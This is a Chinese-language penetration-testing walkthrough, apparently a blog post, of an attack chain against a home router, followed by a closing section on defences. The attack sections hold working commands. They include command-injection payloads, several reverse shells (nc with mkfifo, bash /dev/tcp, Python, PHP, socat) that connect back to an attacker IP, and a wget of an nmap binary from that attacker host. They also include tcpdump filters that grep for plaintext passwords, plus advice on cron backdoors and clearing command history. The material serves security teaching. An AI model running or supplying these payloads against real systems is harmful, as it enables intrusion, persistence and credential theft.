IoT安全实战：从命令注入到内网监控的完整渗透测试链解析

1. 项目概述：一次完整的IoT安全评估实战

最近在整理一个老旧智能家居网关的渗透测试报告，发现其中涉及的命令注入漏洞和后续的横向移动手法，非常典型地反映了当前大量IoT设备的安全现状。这个项目标题“IoT设备渗透实战：从命令注入到流量监控的完整链条解析”，本质上是一次针对物联网设备的深度安全评估过程复盘。它不仅仅是找到一个漏洞点，而是完整地展示了从初始漏洞发现（命令注入），到建立持久化控制（nc反弹shell），再到内部网络探测与关键行为监控（流量监控）的整个攻击链。对于安全研究人员、渗透测试工程师，甚至是IoT设备开发者而言，理解这个链条的每一个环节，都至关重要。它能帮你从攻击者的视角审视自己的产品，也能让你在防守时知道该在哪里重点布防。

简单来说，这个过程就像一次“外科手术式”的入侵：首先找到一个微小的切口（命令注入点），然后插入导管建立通道（反弹shell），最后利用这个通道观察内部器官的运行状态（流量监控）。我们这次实战的目标设备是一个市面常见的智能路由器，其Web管理界面存在一处未过滤的用户输入点。通过这个项目，你将能掌握如何系统性地对一款IoT设备进行安全测试，并理解各个阶段的技术细节与防御思路。

2. 核心漏洞：命令注入的原理与发现

2.1 命令注入漏洞的根源

命令注入，尤其是OS命令注入，是Web应用和嵌入式设备中极其危险的一类漏洞。它的根源在于，应用程序将用户可控的数据，未经充分净化就直接拼接到了系统命令（如ping、traceroute、iwconfig等）中，并交给了底层shell（如/bin/sh）去执行。

在IoT设备中，这类问题尤为普遍。很多设备基于BusyBox等精简系统，其Web管理界面（通常是GoAhead、Boa等轻量级服务器）的后端CGI程序，为了图方便，直接使用system()、popen()或exec()系列函数来调用系统命令完成功能。例如，一个用于诊断网络连通性的“Ping测试”功能，其后端代码可能简单粗暴地写成这样：

char cmd[128]; sprintf(cmd, “ping -c 4 %s”, user_input_ip); system(cmd);

如果user_input_ip来自前端表单且未经检查，攻击者输入8.8.8.8; id，那么实际执行的命令就变成了ping -c 4 8.8.8.8; id。分号;在shell中意味着命令分隔，于是系统在执行完ping之后，还会执行id命令，并将结果返回。这就是最典型的命令注入。

除了分号，常见的命令分隔符和拼接符还包括：

• &：后台执行，ping 8.8.8.8 & id
• &&：逻辑与，前一条成功则执行后一条，ping -c 1 8.8.8.8 && id
• |：管道符，将前一条命令的输出作为后一条的输入，echo test | id
• ||：逻辑或，前一条失败则执行后一条，ping invalid || id
• 反引号`或$()：命令替换，先执行括号或反引号内的命令，ping $(id)
• 换行符\n：在HTTP参数中注入%0a，有时也能起到命令分隔的作用。

在本次实战的智能路由器中，漏洞出现在“系统工具”->“网络诊断”的“Traceroute”功能处。该功能本应接收一个IP地址或域名，但在参数处理时，开发人员遗漏了过滤。

2.2 手动探测与自动化工具辅助发现

发现命令注入点，通常从功能点测试开始。对于任何涉及外部输入并可能调用系统命令的功能（如Ping、Traceroute、重启、配置备份/恢复、固件升级、日志下载等），都需要重点测试。

手动探测步骤：

1. 基础测试：在输入框中提交正常值（如8.8.8.8），观察响应。
2. 分隔符测试：提交8.8.8.8; echo test。观察响应中是否出现test字样，或者响应时间是否有明显变化（因为执行了额外命令）。
3. 盲注测试：如果页面不回显命令结果，就需要进行盲注。提交8.8.8.8 && sleep 5。如果页面响应延迟了大约5秒，说明sleep 5命令被执行了，存在基于时间的盲注。
4. 命令执行验证：确认注入点后，尝试执行无害命令，如8.8.8.8 && whoami或8.8.8.8 | cat /etc/passwd，查看是否能回显系统信息。

自动化工具辅助：手动测试虽然精准，但效率较低。我们可以借助一些工具进行初步筛查。例如，使用Burp Suite的Intruder模块，配合命令注入的Fuzz字典（包含各种分隔符和payload），对目标参数进行批量测试。sqlmap虽然主要用于SQL注入，但其--os-shell选项背后的技术原理，有时也能通过特定的注入点（如基于SQL注入的写文件、执行命令）来获取系统shell，但这在纯OS命令注入场景下不常用。

注意：在实际渗透测试或安全评估中，必须在获得明确授权的前提下进行。未经授权的测试是违法行为。本文所有操作均在授权的实验室环境（如Vulhub、VulnHub靶机或自己搭建的测试设备）中进行。

本次实战中，我们通过手动测试，在traceroute功能的host参数中，使用payload127.0.0.1 && ls -la /tmp，成功在返回页面的错误信息中看到了/tmp目录的列表，确认了命令注入漏洞的存在，并且当前权限是root——这在嵌入式IoT设备中几乎是常态。

3. 建立控制：nc反弹shell的多种姿势

仅仅执行单条命令是远远不够的。我们需要一个交互式的shell，以便持续执行命令、上传下载文件、进行内网探测。这就是“反弹shell”（Reverse Shell）的用武之地。其核心思想是：让目标设备（被控端）主动连接我们控制端的监听端口，并将其标准输入、输出、错误流重定向到这个网络连接上。

3.1 Netcat (nc)：网络工具的“瑞士军刀”

netcat，简称nc，是实现反弹shell最经典的工具。它被称为TCP/IP的“瑞士军刀”，可以读写TCP或UDP网络连接的数据。几乎所有的Linux发行版和BusyBox系统都预装了nc，或者存在功能类似的变体（如ncat,socat）。

反弹shell的基本命令格式如下：

• 控制端（攻击机）监听：nc -lvnp [端口]
  • -l: 监听模式
  • -v: 详细输出
  • -n: 直接使用IP地址，不进行DNS解析
  • -p: 指定监听端口
• 被控端（目标IoT设备）连接并启动shell：nc [控制端IP] [控制端端口] -e /bin/sh
  • -e: 指定在连接建立后执行的程序（这里是/bin/sh）。

然而，现实很骨感。BusyBox中的nc版本往往功能精简，很可能不支持-e参数。这是我们遇到的第一个坑。

3.2 应对无-e参数的nc：管道与文件描述符技巧

当目标设备的nc不支持-e时，我们需要利用Linux的管道和文件描述符重定向来手动构造一个交互式shell通道。这里介绍几种可靠的方法。

方法一：使用/dev/tcp伪设备（Bash特性）如果目标系统使用Bash（很多嵌入式系统用ash或dash，但部分设备可能是Bash），可以利用其内置的/dev/tcp伪设备：

bash -i >& /dev/tcp/[控制端IP]/[控制端端口] 0>&1

或者更易记的写法：

/bin/bash -c ‘bash -i >& /dev/tcp/192.168.1.100/4444 0>&1’

这条命令的意思是：启动一个交互式bash (-i)，将其标准输出和标准错误 (>&) 重定向到TCP连接，同时将标准输入 (0) 也重定向到同一个连接 (&1)。

方法二：使用管道和重定向（通用性更强）这是最可靠的方法，不依赖特定shell或nc版本。原理是：创建一个管道，将nc接收到的数据（来自攻击机）传给/bin/sh执行，再将/bin/sh的输出通过nc发回。

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.100 4444 > /tmp/f

拆解分析：

1. rm /tmp/f; mkfifo /tmp/f：删除旧的（如果存在）并创建一个命名管道/tmp/f。
2. cat /tmp/f | /bin/sh -i 2>&1：从管道/tmp/f中读取数据，交给/bin/sh -i（交互式shell）执行，并将shell的标准错误(2)合并到标准输出(&1)。
3. | nc 192.168.1.100 4444：将上一步shell的输出，通过管道交给nc，发送到攻击机的4444端口。
4. > /tmp/f：将nc从网络连接接收到的数据（即攻击机输入的命令），写入管道/tmp/f。 这样就形成了一个完整的循环：攻击机输入命令 -> nc接收 -> 写入管道 -> shell读取并执行 -> 输出交给nc -> 发回攻击机。

在本次实战中，目标设备的BusyBoxnc果然不支持-e。我们通过命令注入点执行了上述管道法的命令，成功在攻击机的nc监听端获得了root权限的交互式shell。

3.3 反弹shell的稳定性优化

直接反弹的shell往往很不稳定，容易因为网络波动、命令输出过长或按Ctrl+C而中断。我们需要对其进行加固。

1. 使用Python/PHP/Perl等脚本语言如果目标设备安装了这些语言环境，用它们构造反弹shell通常更稳定。

• Python:

  python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.100”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’

• PHP:

  php -r ‘$sock=fsockopen(“192.168.1.100”,4444);exec(“/bin/sh -i <&3 >&3 2>&3”);’

2. 使用socatsocat功能比nc更强大，如果目标设备有安装，是首选：

socat TCP:192.168.1.100:4444 EXEC:‘/bin/sh’,pty,stderr,setsid,sigint,sane

3. 终端环境设置在攻击机获得基础shell后，立即完善终端环境：

# 在获得的反弹shell中执行 python -c ‘import pty; pty.spawn(“/bin/bash”)’ # 或者 script -qc /bin/bash /dev/null # 然后按 Ctrl+Z 挂起 # 在攻击机本地终端执行 stty raw -echo; fg # 最后回车，重置终端 reset

经过这些操作，你会获得一个支持命令历史、Tab补全、清屏等功能的“全功能”终端。

4. 横向移动与信息收集

拿到一个rootshell远不是终点，尤其是对于作为网络入口点的路由器。它很可能连接着一个内部网络（LAN），我们的目标是探索这个内部网络。

4.1 立足点信息收集

首先，在目标路由器上收集一切有用信息：

• 网络配置：ifconfig或ip addr查看所有网卡信息，特别是内网网段（如192.168.0.0/24）。
• 路由表：route -n或ip route。
• ARP缓存：arp -a，查看近期与路由器通信的内网主机。
• 连接情况：netstat -antp或ss -antp，查看当前网络连接和监听端口，寻找其他内网服务。
• 用户和进程：cat /etc/passwd，ps aux。
• 配置文件：查看路由器配置，如/etc/config/network、/etc/config/wireless，可能包含Wi-Fi密码。
• 已连接的客户端：有些路由器有特定命令，如wl assoclist（Broadcom芯片）或iw dev wlan0 station dump，可以列出当前连接的无线客户端。

在我们的测试中，ifconfig显示除了WAN口，还有一个br-lan接口，IP是192.168.31.1，这很可能就是内网网关地址。

4.2 内网存活主机探测

知道了内网网段（192.168.31.0/24），下一步就是探测其中有哪些活跃的主机。

• 使用内置工具：利用路由器上的ping或fping进行扫描。例如，写一个简单的循环：

  for i in {1..254}; do ping -c 1 -W 1 192.168.31.$i | grep “from” & done

• 上传扫描工具：如果设备空间允许，可以从攻击机下载更强大的工具，如nmap的静态编译版本。使用wget或curl从攻击机HTTP服务下载：

  # 在攻击机开启HTTP服务：python3 -m http.server 8080 # 在目标路由器执行： cd /tmp wget http://192.168.1.100:8080/nmap-static chmod +x nmap-static ./nmap-static -sn 192.168.31.0/24

  使用-sn参数进行Ping扫描，快速发现存活主机。

探测发现，内网中有几台活跃主机：192.168.31.101（NAS存储），192.168.31.105（智能电视），192.168.31.110（一台Linux服务器）。

4.3 端口扫描与服务识别

针对发现的存活主机，进行端口扫描，识别开放的服务。

./nmap-static -sS -sV -p 1-1000 192.168.31.110

• -sS: TCP SYN扫描，半开放扫描，相对隐蔽。
• -sV: 版本探测，尝试识别服务及其版本。
• -p 1-1000: 扫描前1000个常用端口。

扫描结果显示，192.168.31.110开放了22(SSH)、80(HTTP)、443(HTTPS)、3306(MySQL)端口。Web服务运行着一个开源的内容管理系统。

5. 流量监控：洞察网络活动

在渗透测试中，有时我们需要了解目标网络内的通信内容，例如抓取管理员的登录凭证、分析应用协议、发现敏感数据传输。在已经获得路由器root权限的情况下，我们可以很方便地进行流量监控。

5.1 基于路由器的流量镜像与抓包

路由器作为网络流量的枢纽，是所有内网设备访问外网及互相通信的必经之路。在这里抓包，可以捕获到整个子网的流量。

使用tcpdumptcpdump是Linux下最经典的网络抓包工具，BusyBox通常包含其精简版。

• 捕获所有经过br-lan接口的流量：

  tcpdump -i br-lan -w /tmp/capture.pcap

  -i指定接口，-w将原始数据包写入文件。抓包文件可以下载到攻击机用Wireshark进行图形化分析。
• 针对性抓包：为了减少数据量，可以添加过滤表达式。
  • 只抓HTTP流量：tcpdump -i br-lan tcp port 80 -w /tmp/http.pcap
  • 抓取特定主机的流量：tcpdump -i br-lan host 192.168.31.110 -w /tmp/target.pcap
  • 抓取DNS查询：tcpdump -i br-lan udp port 53 -w /tmp/dns.pcap

流量镜像（端口镜像）一些稍高级的路由器或交换机系统（如OpenWrt）支持端口镜像（SPAN），可以将指定端口的流量复制一份到另一个端口。如果我们能在路由器上物理接入一个监控设备，这将是最佳方式。但在逻辑渗透中，我们通常直接在被控路由器上使用tcpdump。

实操心得：在资源受限的IoT设备上长时间运行tcpdump抓取全量流量，可能会耗尽存储空间或CPU资源，导致设备异常甚至崩溃。务必进行针对性抓包，或者使用-C参数限制抓包文件大小（如-C 10，每个文件10MB），并使用-W参数限制文件数量。

5.2 实时流量分析与关键信息提取

有时我们需要实时分析流量，而不是事后分析pcap文件。可以将tcpdump的输出通过管道传递给其他工具进行实时处理。

• 提取HTTP请求的URL和Host：

  tcpdump -i br-lan -A -s 0 ‘tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)’ | grep -E ‘(GET|POST|Host)’

  这个复杂的过滤表达式是为了只抓取包含实际数据的TCP包（避免ACK等控制包），然后通过-A以ASCII打印，并用grep过滤出HTTP方法和Host头。
• 抓取明文密码：对于未加密的协议（如HTTP、FTP、Telnet），可以尝试抓取登录凭证。

  tcpdump -i br-lan -A -s 0 ‘tcp port 80’ | grep -i -E ‘(pass=|pwd=|login=|user=|username=|password=)’

在我们的测试中，通过实时监控，我们发现了内网那台NAS设备（192.168.31.101）存在使用HTTP协议进行管理登录的情况，成功抓取到了管理员账户和密码（明文传输），这为后续可能的横向移动提供了新的凭证。

5.3 防御视角：如何检测与防护

从防守方来看，上述攻击链的每一步都存在检测和防护点。

1. 命令注入防护：
   • 输入验证：对用户输入进行严格的白名单过滤，只允许预期的字符（如IP地址只允许数字和点）。
   • 避免直接调用系统命令：使用安全的API替代system()、popen()。如必须使用，应使用execve()等函数并传递参数数组，而不是拼接字符串。
   • 最小权限原则：运行Web服务的进程不应以root权限运行。
2. 反弹shell检测：
   • 网络监控：监控内部主机向外部异常IP/端口发起的连接，尤其是nc、bash、python等进程发起的连接。
   • 主机审计：检查进程列表中的可疑网络连接（netstat -antp），关注/dev/tcp相关的连接。
   • HIDS（主机入侵检测系统）：部署像Osquery、Wazuh这样的工具，监控进程创建和网络连接行为。
3. 横向移动与流量监控防护：
   • 网络分段：将IoT设备置于独立的VLAN中，限制其与核心业务网络的通信。
   • 加密通信：确保所有管理界面和敏感服务都使用HTTPS、SSH等加密协议，避免明文传输凭证。
   • 网络流量分析（NTA）：部署流量分析系统，检测网络内的异常扫描行为（如ARP扫描、ICMP扫描）、异常协议流量或数据外传。
   • 定期更新与补丁：及时更新IoT设备固件，修复已知漏洞。

6. 完整攻击链复现与总结

让我们把整个链条串联起来，回顾一下从外到内的完整过程：

1. 信息收集与漏洞发现：对目标智能路由器进行端口扫描，发现开放80端口（Web管理）。对Web界面进行功能测试，在“网络诊断”->“Traceroute”功能处，发现host参数存在命令注入漏洞。
2. 漏洞利用与初始访问：利用命令注入漏洞，执行命令127.0.0.1 && rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 攻击机IP 4444 > /tmp/f。在攻击机使用nc -lvnp 4444监听，成功获取路由器root权限的交互式shell。
3. 权限维持与环境优化：在反弹的shell中，使用Python或script命令升级为完全交互式的TTY。检查crontab、rc.local等位置，尝试植入后门以实现持久化（例如，写入一个定时反向连接的cron任务）。
4. 内网信息收集：在路由器上执行ifconfig、arp -a、netstat等命令，确定内网网段为192.168.31.0/24，并发现若干活跃主机。
5. 内网横向移动：从攻击机下载静态编译的nmap到路由器，对内网主机进行端口扫描。发现192.168.31.110服务器开放80端口。通过路由器代理或端口转发，访问该内网Web服务。同时，通过流量监控发现NAS的明文密码。
6. 数据获取与流量监控：在路由器上使用tcpdump对br-lan接口进行抓包，特别是监控80端口流量。分析捕获的流量，提取到NAS的明文管理密码。根据情况，可能进一步利用该密码访问NAS，获取敏感文件。
7. 清理痕迹（在授权测试中，根据要求决定是否执行）：删除上传的工具、清理命令历史（history -c）、删除创建的管道文件等。

这个实战链条清晰地展示了一个外部威胁如何通过一个看似微小的漏洞（命令注入），逐步深入，最终控制网络核心设备并窥探整个内网流量的过程。对于安全人员，它强调了纵深防御和最小化攻击面的重要性；对于开发者，它是一次关于安全编码和默认安全配置的深刻警示。防御永远不是一个单点问题，而是一个覆盖开发、部署、运维、监控的完整体系。